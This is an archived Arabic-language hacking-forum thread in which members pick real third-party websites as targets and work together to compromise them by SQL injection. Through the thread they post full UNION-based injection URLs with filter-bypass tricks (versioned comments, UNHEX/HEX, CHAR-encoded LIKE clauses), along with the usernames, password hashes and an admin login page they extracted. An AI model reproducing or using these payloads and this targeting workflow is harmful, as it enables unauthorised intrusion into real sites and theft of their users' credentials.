:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

aircrack -ng 12-09-2010 08:51 PM

السلام عليكم
هلا اخي فولكانو منور الغرفة

اليوم جبتلكم موقع لازمله شوي شطارة

http://www.dawnnet.org/resources-news.php?id=170

بالتوفيق شباب

darkman.dz 12-09-2010 10:38 PM

جاري المحاولة مع العلم أنني عندي فترة لم أخترق بالسيكول و الظاهر أني نسيت كثير أشياء ههههههههههه
لكن بإذن الله عودة قوية :)

darkman.dz 12-09-2010 11:14 PM

أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/
و لم تنفع معي
هل إستخدمت طريقة جديدة في تخطي الفوربدن 403

aircrack -ng 12-10-2010 02:06 AM

[QUOTE=_darkman_;265643]أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/
و لم تنفع معي
هل إستخدمت طريقة جديدة في تخطي الفوربدن 403[/
السلام عليكم وليد بلادي
تعرف هذا الموقع فيه خاصية عجباني تستخدم تقريبا كل طرق وايضا هذا الموقع مانع عدة اوامر
وانا تخطيت الفوريدن مش ب union ب select وايضا لما راح تتخطى هالشيء راح يكون فيه مشكل اخر وايضا فيه مشكل اخر الحقنة بس لو تركز شوي راح تتخطاهم
اذا لم يحقنه اي واحد راح ارفع الشرح فيديو

Victors 12-10-2010 04:00 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 265573)
السلام عليكم
هلا اخي فولكانو منور الغرفة

اليوم جبتلكم موقع لازمله شوي شطارة

http://www.dawnnet.org/resources-news.php?id=170

بالتوفيق شباب


استطعت حقن الموقع لكني لم اوفق في استخراج اسم الادمن والباسوورد :a43:

aircrack -ng 12-10-2010 05:44 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265725)
استطعت حقن الموقع لكني لم اوفق في استخراج اسم الادمن والباسوورد :a43:

تسلم يابطل حاول مرة اخرى وركز وراح تجيبه

Victors 12-10-2010 03:33 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 265754)
تسلم يابطل حاول مرة اخرى وركز وراح تجيبه


المشكله انو الجداول والاعمدة اللي اخمنها وتطلع صح تكون فاضية مافيها بيانات :(

aircrack -ng 12-10-2010 04:08 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265885)
المشكله انو الجداول والاعمدة اللي اخمنها وتطلع صح تكون فاضية مافيها بيانات :(

هلا حبيبي
لاتخمن هالموقع الاصدار الخامس
ركز فقط اخي بعرف انك راح تجيبه
كل التحية لك اخي على المجهود

darkman.dz 12-10-2010 04:59 PM

[QUOTE=عبد الصمد;265706]
اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 265643)
أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/
و لم تنفع معي
هل إستخدمت طريقة جديدة في تخطي الفوربدن 403[/
السلام عليكم وليد بلادي
تعرف هذا الموقع فيه خاصية عجباني تستخدم تقريبا كل طرق وايضا هذا الموقع مانع عدة اوامر
وانا تخطيت الفوريدن مش ب union ب select وايضا لما راح تتخطى هالشيء راح يكون فيه مشكل اخر وايضا فيه مشكل اخر الحقنة بس لو تركز شوي راح تتخطاهم
اذا لم يحقنه اي واحد راح ارفع الشرح فيديو

أرجو أن لا تكون قد إستعملت الفلترة لأني لم أجربها ........و أنقتها مقتا شديدا
أنا لما أصادف موقع يحتاج لفلترة أمر عليه مرور الكرام ولا أحاول معه لأني أكرهها

aircrack -ng 12-10-2010 07:07 PM

اوكي اخي راح احط الحقنة
كود:


http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,UNHEX(HEX(/*!concat*/(username,0x3a,user_password))),5,6,7,8,9,10,11,12+from+phpbb_users --

الاستعلام
كود:

/*!select*/
الموفع مانع كلمة
concat
التخطي ب
كود:

/*!concat*/
الموقع مانع
group_
الاستعلام ب
limit
مشكل اخر الحقنة والتخطي ب
UNHEX

اليوزر admin
الباس 21232f297a57a5a743894a0e4a801fc3
اتمنى انو تكون وصلة الفكرة
ومشكور مشرفنا الغالي على المجهود
اخوك عبد الصمد

Victors 12-10-2010 08:34 PM

اخوي لما انفذ حقنك هذا اللي يظهر لي

Anonymous:

نفس اللي كان يطلع معي

مع العلم انو حقني كان بدون UNHEX(HEX(

Victors 12-10-2010 08:47 PM

زبط معي بعد اضافة limit 1,1 بالاخير

وانا كنت اكتب limit 0,10 ويطلع لي سجل واحد بس الاول

يعني شكل الحقن بيكون
كود:

http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,/*!concat*/(username,0x3a,user_password),5,6,7,8,9,10,11,12 from phpbb_users limit 1,1 --

agentsimo 12-10-2010 09:17 PM

السلام عليكم هل من هدف جديد ??

aircrack -ng 12-11-2010 12:27 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265987)
اخوي لما انفذ حقنك هذا اللي يظهر لي

Anonymous:

نفس اللي كان يطلع معي

مع العلم انو حقني كان بدون UNHEX(HEX(

هلا اخي
انا قلتلك لازم تركز
ضع حقنتي ونزل لتحت الصفحة راح تلاقي اليوزر والباس
اخي لازم تركز جيدا وانا كنت عارف انك راح تجيبه بس انت ماكنت مركز
هالموفع مانع كلمة group_
بس يطلع كل الجداول واليوزرات والباسوردات مرة وحدة
ولما تستعمل الامر limit
هالامر منشان طلع جداول اخرى اذا اطلعتش المرة الاولى
فهمت علي اخي

إسلام العالم 12-11-2010 10:56 AM

[align=center]بارك الله فيكم غرفة رائعة
سوف أكون معكم إن شاءا لله
هل من هدف جديد؟؟؟؟؟[/align]

darkman.dz 12-11-2010 02:01 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 265956)
اوكي اخي راح احط الحقنة
كود:


http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,UNHEX(HEX(/*!concat*/(username,0x3a,user_password))),5,6,7,8,9,10,11,12+from+phpbb_users --

الاستعلام
كود:

/*!select*/
الموفع مانع كلمة
concat
التخطي ب
كود:

/*!concat*/
الموقع مانع
group_
الاستعلام ب
limit
مشكل اخر الحقنة والتخطي ب
UNHEX

اليوزر admin
الباس 21232f297a57a5a743894a0e4a801fc3
اتمنى انو تكون وصلة الفكرة
ومشكور مشرفنا الغالي على المجهود
اخوك عبد الصمد

شكرا أخي عبد الصمد
أنا أعرف طرقة التخطي /*!SELECT*/
لكن أنا أعرفها بالنسبة لل forbidden 406
لم أكن أعلم أن هاته الطريقة تنفع في forbidden 404
هههههههههههه
شكرا على هاته المعلومة الجديدة
smilies15
smilies14
:a07:

aircrack -ng 12-11-2010 07:19 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 266444)
شكرا أخي عبد الصمد
أنا أعرف طرقة التخطي /*!SELECT*/
لكن أنا أعرفها بالنسبة لل forbidden 406
لم أكن أعلم أن هاته الطريقة تنفع في forbidden 404
هههههههههههه
شكرا على هاته المعلومة الجديدة
smilies15
smilies14
:a07:

مرسي عليك وليد بلادي
وايضا هاذي الغرفة لتبادل الخبرات وتطوير الذات
ربنا يسعدك اخي
كل الاحترام والتقدير لك

aircrack -ng 12-11-2010 10:45 PM

السلام عليكم
الهدف موقع للمغني شيكو لولو ههههههههههه
http://www.northernharbour.com/gallery.php?id=5

بالتوفيق شباب

darkman.dz 12-11-2010 10:49 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 266562)
مرسي عليك وليد بلادي
وايضا هاذي الغرفة لتبادل الخبرات وتطوير الذات
ربنا يسعدك اخي
كل الاحترام والتقدير لك

تعجبوني يا ولاد لبلاد + الإحترام متبادل + جاري مع الهدف الجديد

darkman.dz 12-11-2010 11:09 PM

الحقنة وصلت إلى
كود:

http://www.northernharbour.com/gallery.php?id=-5%20/*!union*/%20%20select%201,2,3,/*!concat*/%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns--
هل من إرشادات
لأني جربت ال unhex(hex())
وجربت /*!*/
و مانفعو :)

aircrack -ng 12-12-2010 01:34 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 266645)
الحقنة وصلت إلى
كود:

http://www.northernharbour.com/gallery.php?id=-5%20/*!union*/%20%20select%201,2,3,/*!concat*/%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns--
هل من إرشادات
لأني جربت ال unhex(hex())
وجربت /*!*/
و مانفعو :)

هلا اخي
media_pictures:other:mexpress_2894229478

حقنتك صحيحة كمل
انت حبيت تستعرض الجداول ضيف الامر
limit
شوف معي
كود:

http://www.northernharbour.com/gallery.php?id=-5 union  /*!select*/  1,2,3,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+limit+1,1--
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_sc hema
فهمت علي اخي بس انت كمل حقنتك عادي بدون اضافة الامر limit لغاية لما تجي طلع اليوزرات اوكي يعني

كود:

/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97,
تسلم مشرفنا الغالي

إسلام العالم 12-12-2010 03:06 AM

اقتباس:

http://www.northernharbour.com/galle...re+column_name +like+char(37, 112, 97, 115, 115, 37)--
الباس : wef.xIRu/YVfo أكيد فكها كتير صعب
اليوزر : group_id

agentsimo 12-12-2010 04:57 AM

السلام عليكم
بفففففففف دائما القاكم بداتو علي الحقن بففف دائما اتي متاخرررررر
المهم لقد حقنت الموقع
عدد الاعمدة 5
http://www.northernharbour.com/gallery.php?id=5 UNION /*!select*/ 1,2,3,4,5--
تابل نايم يوزر calendar_users
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,table_name,5+from+information_schema.columns +where+column_name+like+CHAR(37, 112, 97, 115, 37)--
تابل يوزر

http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+1,1--
تابل باس
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+2,1--
يوزر mexpress
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,username,5+from+calendar_users--
الباس wef.xIRu/YVfo
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,password,5+from+calendar_users--
و في الاخير اتمنى ان اكون انا اول من جلب الحقنة الكاملة للموقع :c

agentsimo 12-12-2010 05:01 AM

طبعا اصدار القاعدة البينات هو 5
و بالنسبة لصفحة الادمين فلم اجدها

darkman.dz 12-12-2010 12:40 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 266724)
هلا اخي
media_pictures:other:mexpress_2894229478

حقنتك صحيحة كمل
انت حبيت تستعرض الجداول ضيف الامر
limit
شوف معي
كود:

http://www.northernharbour.com/gallery.php?id=-5 union  /*!select*/  1,2,3,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+limit+1,1--
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_sc hema
فهمت علي اخي بس انت كمل حقنتك عادي بدون اضافة الامر limit لغاية لما تجي طلع اليوزرات اوكي يعني

كود:

/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97,
تسلم مشرفنا الغالي

أخي عبد الصمد
أنا أعرف الحقن جيدا
و أعرف إستخدام الأمر limit
لكن في متصفحي لا يعرض شيئا لغاية الآن
لا أعلم السبب لماذا
لكن مشكور على التوضيح يا وليد بلادي
1,2,3 viva l'algerie :)

واصل + أحاى تقييم ...لأحلى عضو :a09:

darkman.dz 12-12-2010 12:58 PM

أنظر يا أخي عبد الصمد
كود:

http://www.northernharbour.com/gallery.php?id=-5 /*!union*/  select 1,2,3,/*!concat*/(group_id,0x3a,username,0x3a,password),5+from+calendar_users--
جدول اليوزر
كود:

calendar_users:password:mexpress_2894229478
العمود الخاص باليوزر
كود:

calendar_users:username:mexpress_2894229478
العمود الخاص بالباسوورد
كود:

calendar_users:password:mexpress_2894229478
عمود ال id
كود:

calendar_users:group_id:mexpress_2894229478
أنا قصدت أنو الموقع لا يسمح بالأمر Limit للتنقل في الجداول قبل وضع الإستعلام
كود:

where+column_name+LIKE (%pass)%
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:

إسلام العالم 12-12-2010 01:36 PM

لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:[/QUOTE]

نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group

ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد...

darkman.dz 12-12-2010 01:56 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 266885)
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:


نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group

ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد...
[/QUOTE]

هههههههههههههههههههههههه
عصفورين بحجر واحد :cry[1]:

إسلام العالم 12-12-2010 02:45 PM

منتظرين أهداف جديدة

darkman.dz 12-12-2010 05:45 PM

كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=11
هذف جديد

جاري المحاولة معه
و أنتم أيضا
:)

aircrack -ng 12-12-2010 08:54 PM

السلام عليكم
هاانا رجعت معذرة شباب انا كنت في العمل
مشرفنا انت مافهمتني شو كنت عم اقصد وانا مافهمتك شو كنت تقصد بس بعد التوضيح فهمتك كل التحية لك اخي الحبيب
الحقنة بس اقولكم شيء هالموقع كارثة ثقيل جدا الصفحة تقد ساعة عشان تظهر ههههههههههه
النت عندي 236 كيلو بايت ههههههههههههههه
كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(user_name,0x3a,id,0x3a,pass_word),3,4,5+from+members
نرجع الموقع مانع كلمة concat
وايضا لما نحاول نتخطى بالامر
كود:

/*!concat*/
يجينا خطا
التخطي ب
كود:

/*!CONCAT
يعني نستعمل تكبير concat يعني تصير هيك CONCAT

واخر الحقنة استعملو الامر LIMIT للبحث عن شيح القبيلة الادمن هههههههههههه انا ماقدرت ابحث لانو النت بيفصل كثير وهالموقع ثقيل جدا

darkman.dz 12-12-2010 09:34 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 267038)
السلام عليكم
هاانا رجعت معذرة شباب انا كنت في العمل
مشرفنا انت مافهمتني شو كنت عم اقصد وانا مافهمتك شو كنت تقصد بس بعد التوضيح فهمتك كل التحية لك اخي الحبيب
الحقنة بس اقولكم شيء هالموقع كارثة ثقيل جدا الصفحة تقد ساعة عشان تظهر ههههههههههه
النت عندي 236 كيلو بايت ههههههههههههههه

ههههههههههههههههههههه
لا بأس أخي صمودة
هههههههههههههههههههههههه
التحية و التقدير والإحترام متبادلين
أعذروني لقد عدت الآن فقط :)
جاري حقن الموقع بإذن الله :)

aircrack -ng 12-12-2010 09:48 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 267069)
ههههههههههههههههههههه
لا بأس أخي صمودة
هههههههههههههههههههههههه
التحية و التقدير والإحترام متبادلين
أعذروني لقد عدت الآن فقط :)
جاري حقن الموقع بإذن الله :)

اهلا اخي ومشرفنا الغالي منور الغرفة
جاري البحث عن فئران تجارب جديدة هههههههههه

كل الاحترام والتقدير لك اخي

darkman.dz 12-12-2010 09:50 PM

أخي صمودة
بالنسبة للأنترنت
أنا أيضا 256 ميقا بايت
نتاع الزواولة
ههههههههههههههههههههههههههه

darkman.dz 12-12-2010 10:04 PM

كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/,3,4,5+from+informaion_schema.columns--
الحقنة وصلت إلى هنا
و الموقع ثقيل جدا
و النت تنقطع
جاري الإكمال بعد العودة :)

agentsimo 12-12-2010 10:05 PM

السلام عليكم شباب كيف احولكم ?
هل حقنتي السابقة صحيحة ?
و هل من هدف جديد ?

aircrack -ng 12-12-2010 10:14 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 267083)
أخي صمودة
بالنسبة للأنترنت
أنا أيضا 256 ميقا بايت
نتاع الزواولة
ههههههههههههههههههههههههههه

هههههههههه انا استعمل موبي كوناكت تاع موبليس
يايما شحال ثقيلة ههههههههههههههه
نوكل عليهم ربي هههههههههههه

هدف جديد سهل الحقن وهذا اول موقع حقنته في بداتيتي في السكيول
ذكريات يعني هههههههههههa012

http://www.michaelkenna.net/publicat...tail.php?id=79

darkman.dz 12-12-2010 10:16 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 267098)
السلام عليكم شباب كيف احولكم ?
هل حقنتي السابقة صحيحة ?
و هل من هدف جديد ?


أي حقنة ؟

agentsimo 12-12-2010 10:24 PM

تم الحقن
http://www.michaelkenna.net/publicat...ail.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user,0x3a,password) ,11,12+from+tblUsers--

صفحة الادمين https://www.michaelkenna.net/admin/login.php
الهاشات لم افكها

aircrack -ng 12-12-2010 10:30 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 267104)
تم الحقن
http://www.michaelkenna.net/publicat...ail.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user,0x3a,password) ,11,12+from+tblUsers--

صفحة الادمين https://www.michaelkenna.net/admin/login.php
الهاشات لم افكها

تسلم اخي
ممكن تعيرني شوية نت لانو النت تبعي بيموت هههههههههه:a09:
بطل اخي واصل
الهاش انا حاولت معه كثير بس ماقدرت افكو يمكن فيه احد الاخوان يقدر يفكو


الساعة الآن 02:23 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0